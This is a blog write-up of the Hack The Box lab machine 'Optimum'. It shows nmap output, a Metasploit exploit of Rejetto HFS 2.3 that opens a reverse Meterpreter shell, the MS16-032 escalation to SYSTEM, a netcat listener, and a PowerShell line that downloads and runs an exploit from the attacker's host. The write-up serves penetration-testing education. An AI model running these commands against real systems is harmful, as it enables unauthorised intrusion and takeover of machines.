Hack the Box Optimum
9 min readJul 24, 2020
My write-up on HTB’s retired machine “Optimum” that outlines Metasploit usage and manual exploitation.
Disclaimer
This site contains materials that can be potentially damaging or dangerous. Refer to the laws in your province/country before accessing, using, or in any other way utilizing these materials. These materials are for educational and research purposes only. Persons accessing this information assume full responsibility for the use and agree to not use this content for any illegal purpose.
Reconnaissance
First, let’s use the nmapAutomator to automate the process of recon/enumeration.
Summary of our nmap scan results:
./nmapAutomator.sh 10.10.10.8 vulnsRunning a vulns scan on 10.10.10.8Host is likely running Windows---------------------Starting Nmap Vulns Scan---------------------Running CVE scan on basic portsStarting Nmap 7.80 ( https://nmap.org ) at 2020-04-25 09:27 EDT
Nmap scan report for 10.10.10.8
Host is up (0.034s latency).PORT STATE SERVICE VERSION
80/tcp open http HttpFileServer httpd 2.3
|_http-server-header: HFS 2.3
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windowsService detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 8.40 secondsRunning Vuln scan on basic portsStarting Nmap 7.80 ( https://nmap.org ) at 2020-04-25 09:27 EDT
Pre-scan script results:
| broadcast-avahi-dos:
| Discovered hosts:
| 224.0.0.251
| After NULL UDP avahi packet DoS (CVE-2011-1002).
|_ Hosts are all up (not vulnerable).
Nmap scan report for 10.10.10.8
Host is up (0.12s latency).PORT STATE SERVICE VERSION
80/tcp open http HttpFileServer httpd 2.3
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
|_http-csrf: Couldn't find any CSRF vulnerabilities.
|_http-dombased-xss: Couldn't find any DOM based XSS.
| http-fileupload-exploiter:
|
|_ Couldn't find a file-type field.
| http-method-tamper:
| VULNERABLE:
| Authentication bypass by HTTP verb tampering
| State: VULNERABLE (Exploitable)
| This web server contains password protected resources vulnerable to authentication bypass
| vulnerabilities via HTTP verb tampering. This is often found in web servers that only limit access to the
| common HTTP methods and in misconfigured .htaccess files.
|
| Extra information:
|
| URIs suspected to be vulnerable to HTTP verb tampering:
| /~login [GENERIC]
|
| References:
| http://www.mkit.com.ar/labs/htexploit/
| http://capec.mitre.org/data/definitions/274.html
| http://www.imperva.com/resources/glossary/http_verb_tampering.html
|_ https://www.owasp.org/index.php/Testing_for_HTTP_Methods_and_XST_%28OWASP-CM-008%29
|_http-server-header: HFS 2.3
| http-slowloris-check:
| VULNERABLE:
| Slowloris DOS attack
| State: LIKELY VULNERABLE
| IDs: CVE:CVE-2007-6750
| Slowloris tries to keep many connections to the target web server open and hold
| them open as long as possible. It accomplishes this by opening connections to
| the target web server and sending a partial request. By doing so, it starves
| the http server's resources causing Denial Of Service.
|
| Disclosure date: 2009-09-17
| References:
| https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-6750
|_ http://ha.ckers.org/slowloris/
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
| http-vuln-cve2011-3192:
| VULNERABLE:
| Apache byterange filter DoS
| State: VULNERABLE
| IDs: CVE:CVE-2011-3192 BID:49303
| The Apache web server is vulnerable to a denial of service attack when numerous
| overlapping byte ranges are requested.
| Disclosure date: 2011-08-19
| References:
| https://www.securityfocus.com/bid/49303
| https://www.tenable.com/plugins/nessus/55976
| https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-3192
|_ https://seclists.org/fulldisclosure/2011/Aug/175
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windowsService detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 208.90 seconds---------------------Finished all Nmap scans---------------------
Enumeration
Based on our nmap result, we have only port 80/tcp to work with and before further enumerating we can start browsing to the website and examine the site manually.
Next steps that we could do to further enumeration is to conduct Nikto, Dirbuster, or another web application assessment tool, however, since we have the server application information — ‘HttpFileServer 2.3’, we can start there.
“HttpFileServer version 2.3” is from rejetto.com, proceeding to expliot-db.com if we can find any related information.
Results from exploit-db
Based on our query from exploit-db, there are several exploits that we can worked with. Let’s start with Metasploit module “Rejetto HTTP File Server (HFS) — Remote Command Execution (Metasploit)”
Exploitation
Initial Foothold
msf > search rejettoMatching Modules
================# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 exploit/windows/http/rejetto_hfs_exec 2014-09-11 excellent Yes Rejetto HttpFileServer Remote Command Executionmsf >* Set our options for RHOST and LHOST. Everything else can be left as is.
Module options (exploit/windows/http/rejetto_hfs_exec):Name Current Setting Required Description
---- --------------- -------- -----------
HTTPDELAY 10 no Seconds to wait before terminating web server
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
RHOST 10.10.10.8 yes The target address
RPORT 80 yes The target port (TCP)
SRVHOST 0.0.0.0 yes The local host to listen on. This must be an address on the local machine or 0.0.0.0
SRVPORT 8080 yes The local port to listen on.
SSL false no Negotiate SSL/TLS for outgoing connections
SSLCert no Path to a custom SSL certificate (default is randomly generated)
TARGETURI / yes The path of the web application
URIPATH no The URI to use for this exploit (default is random)
VHOST no HTTP server virtual hostExploit target:Id Name
-- ----
0 Automatic
After setting all the options required, exploit can be executed.
msf exploit(windows/http/rejetto_hfs_exec) > exploit[*] Started reverse TCP handler on 10.10.14.27:4444
[*] Using URL: http://0.0.0.0:8080/O1WxakE
[*] Local IP: http://172.16.70.162:8080/O1WxakE
[*] Server started.
[*] Sending a malicious request to /
[*] Payload request received: /O1WxakE
[*] Sending stage (180291 bytes) to 10.10.10.8
[*] Meterpreter session 1 opened (10.10.14.27:4444 -> 10.10.10.8:49162) at 2020-04-25 10:27:41 -0400
[!] Tried to delete %TEMP%\SWTVkBbOKu.vbs, unknown result
[*] Server stopped.meterpreter > getuid
Server username: OPTIMUM\kostas
Exploit worked, however, we only obtained non-privilege user account and the user.txt flag.
meterpreter > sysinfo
Computer : OPTIMUM
OS : Windows 2012 R2 (6.3 Build 9600).
Architecture : x64
System Language : el_GR
Domain : HTB
Logged On Users : 1
Meterpreter : x86/windows
meterpreter >meterpreter > dir
Listing: C:\Users\kostas\Desktop
================================Mode Size Type Last modified Name
---- ---- ---- ------------- ----
40777/rwxrwxrwx 0 dir 2020-05-01 19:27:54 -0400 %TEMP%
100666/rw-rw-rw- 282 fil 2017-03-18 07:57:16 -0400 desktop.ini
100777/rwxrwxrwx 760320 fil 2014-02-16 06:58:52 -0500 hfs.exe
100444/r--r--r-- 32 fil 2017-03-18 08:13:18 -0400 user.txt.txtmeterpreter >
Privilege Escalation
System Information
systeminfoHost Name: OPTIMUM
OS Name: Microsoft Windows Server 2012 R2 Standard
OS Version: 6.3.9600 N/A Build 9600
OS Manufacturer: Microsoft Corporation
OS Configuration: Standalone Server
OS Build Type: Multiprocessor Free
Registered Owner: Windows User
Registered Organization:
Product ID: 00252-70000-00000-AA535
Original Install Date: 18/3/2017, 1:51:36 ▒▒
System Boot Time: 29/7/2020, 8:19:04 ▒▒
System Manufacturer: VMware, Inc.
System Model: VMware Virtual Platform
System Type: x64-based PC
Processor(s): 1 Processor(s) Installed.
[01]: AMD64 Family 23 Model 1 Stepping 2 AuthenticAMD ~2000 Mhz
BIOS Version: Phoenix Technologies LTD 6.00, 12/12/2018
Windows Directory: C:\Windows
System Directory: C:\Windows\system32
Boot Device: \Device\HarddiskVolume1
System Locale: el;Greek
Input Locale: en-us;English (United States)
Time Zone: (UTC+02:00) Athens, Bucharest
Total Physical Memory: 4.095 MB
Available Physical Memory: 3.471 MB
Virtual Memory: Max Size: 5.503 MB
Virtual Memory: Available: 4.927 MB
Virtual Memory: In Use: 576 MB
Page File Location(s): C:\pagefile.sys
Domain: HTB
Logon Server: \\OPTIMUM
Hotfix(s): 31 Hotfix(s) Installed.
[01]: KB2959936
[02]: KB2896496
[03]: KB2919355
[04]: KB2920189
[05]: KB2928120
[06]: KB2931358
[07]: KB2931366
[08]: KB2933826
[09]: KB2938772
[10]: KB2949621
[11]: KB2954879
[12]: KB2958262
[13]: KB2958263
[14]: KB2961072
[15]: KB2965500
[16]: KB2966407
[17]: KB2967917
[18]: KB2971203
[19]: KB2971850
[20]: KB2973351
[21]: KB2973448
[22]: KB2975061
[23]: KB2976627
[24]: KB2977629
[25]: KB2981580
[26]: KB2987107
[27]: KB2989647
[28]: KB2998527
[29]: KB3000850
[30]: KB3003057
[31]: KB3014442
Network Card(s): 1 NIC(s) Installed.
[01]: Intel(R) 82574L Gigabit Network Connection
Connection Name: Ethernet0
DHCP Enabled: No
IP address(es)
[01]: 10.10.10.8
Hyper-V Requirements: A hypervisor has been detected. Features required for Hyper-V will not be displayed.
Root flag obtained
After many trial and error testing different local exploits from metsploit expliot suggester, found ms16–032 that gave us admin privilege.
msf5 exploit(windows/local/ms16_032_secondary_logon_handle_privesc) > exploit[*] Started reverse TCP handler on 10.10.14.6:5555
[+] Compressed size: 1016
[!] Executing 32-bit payload on 64-bit ARCH, using SYSWOW64 powershell
[*] Writing payload file, C:\Users\kostas\AppData\Local\Temp\VIkcPqsW.ps1...
[*] Compressing script contents...
[+] Compressed size: 3592
[*] Executing exploit script...
__ __ ___ ___ ___ ___ ___ ___
| V | _|_ | | _|___| |_ |_ |
| |_ |_| |_| . |___| | |_ | _|
|_|_|_|___|_____|___| |___|___|___|[by b33f -> @FuzzySec][?] Operating system core count: 2
[>] Duplicating CreateProcessWithLogonW handle
[?] Done, using thread handle: 2144[*] Sniffing out privileged impersonation token..[?] Thread belongs to: svchost
[+] Thread suspended
[>] Wiping current impersonation token
[>] Building SYSTEM impersonation token
[?] Success, open SYSTEM token handle: 2124
[+] Resuming thread..[*] Sniffing out SYSTEM shell..[>] Duplicating SYSTEM token
[>] Starting token race
[>] Starting process race
[!] Holy handle leak Batman, we have a SYSTEM shell!!cTu8VEo134AzTq3PknBtaK0T8EOyorvJ
[+] Executed on target machine.
[*] Sending stage (176195 bytes) to 10.10.10.8
[*] Meterpreter session 2 opened (10.10.14.6:5555 -> 10.10.10.8:49180) at 2020-07-23 08:18:08 -0400
[+] Deleted C:\Users\kostas\AppData\Local\Temp\VIkcPqsW.ps1meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter >C:\Users\kostas\Desktop>dir ..\..\administrator\desktop\
dir ..\..\administrator\desktop\
Volume in drive C has no label.
Volume Serial Number is D0BC-0196Directory of C:\Users\administrator\desktop18/03/2017 03:14 ▒▒ <DIR> .
18/03/2017 03:14 ▒▒ <DIR> ..
18/03/2017 03:14 ▒▒ 32 root.txt
1 File(s) 32 bytes
2 Dir(s) 31.893.270.528 bytes free
Manual exploitation
Searched same vulnerability “Rejetto HTTP File Server (HFS) 2.3.x — Remote Command Execution” and found an exploit at exploit-db.
---------------------------------------------------------------- ---------------------------------
Exploit Title | Path
---------------------------------------------------------------- ---------------------------------
Rejetto HTTP File Server (HFS) 2.3.x - Remote Command Execution | windows/remote/39161.py
---------------------------------------------------------------- ---------------------------------
Shellcodes: No Results
root@cainta:~/Documents/htb/Optimum# searchsploit rejetto
---------------------------------------------------------------- ---------------------------------
Exploit Title | Path
---------------------------------------------------------------- ---------------------------------
Rejetto HTTP File Server (HFS) - Remote Command Execution (Meta | windows/remote/34926.rb
Rejetto HTTP File Server (HFS) 1.5/2.x - Multiple Vulnerabiliti | windows/remote/31056.py
Rejetto HTTP File Server (HFS) 2.2/2.3 - Arbitrary File Upload | multiple/remote/30850.txt
Rejetto HTTP File Server (HFS) 2.3.x - Remote Command Execution | windows/remote/34668.txt
Rejetto HTTP File Server (HFS) 2.3.x - Remote Command Execution | windows/remote/39161.py
Rejetto HTTP File Server (HFS) 2.3a/2.3b/2.3c - Remote Command | windows/webapps/34852.txt
---------------------------------------------------------------- ---------------------------------Modified the exploit to reflect my local settings:
Setup netcat listener on port 4444 and on another window, hosted nc.exe
root@cainta:~/Documents/htb/Optimum# rlwrap nc -nlvp 4444
listening on [any] 4444 ...
User flag obtained
Privilege Escalation
Since we have already identified local exploit to elevate our privilege (metasploit section), let’s use the same local exploit.
Host http service so we can download our exploit from the server, and from the server, we can then download the executable (exploit).
Since wget nor curl is not available, we have to use powershell commands to download our exploit.
C:\Users\kostas\Downloads>powershell -c "(new-object System.Net.WebClient).DownloadFile('http://10.10.14.6:80/41020.exe', 'c:\Users\kostas\Downloads\41020.exe')"
powershell -c "(new-object System.Net.WebClient).DownloadFile('http://10.10.14.6:80/41020.exe', 'c:\Users\kostas\Downloads\41020.exe')"Root flag obtained
C:\Users\kostas\Downloads>41020.exe
41020.exe
Microsoft Windows [Version 6.3.9600]
(c) 2013 Microsoft Corporation. All rights reserved.C:\Users\kostas\Downloads>whoami
whoami
nt authority\systemC:\Users\kostas\Downloads>dir ..\desktop
dir ..\desktop
Volume in drive C has no label.
Volume Serial Number is D0BC-0196Directory of C:\Users\kostas\desktop30/07/2020 08:48 ▒▒ <DIR> .
30/07/2020 08:48 ▒▒ <DIR> ..
18/03/2017 03:11 ▒▒ 760.320 hfs.exe
18/03/2017 03:13 ▒▒ 32 user.txt.txt
2 File(s) 760.352 bytes
2 Dir(s) 31.886.520.320 bytes freeC:\Users\kostas\Downloads>
References
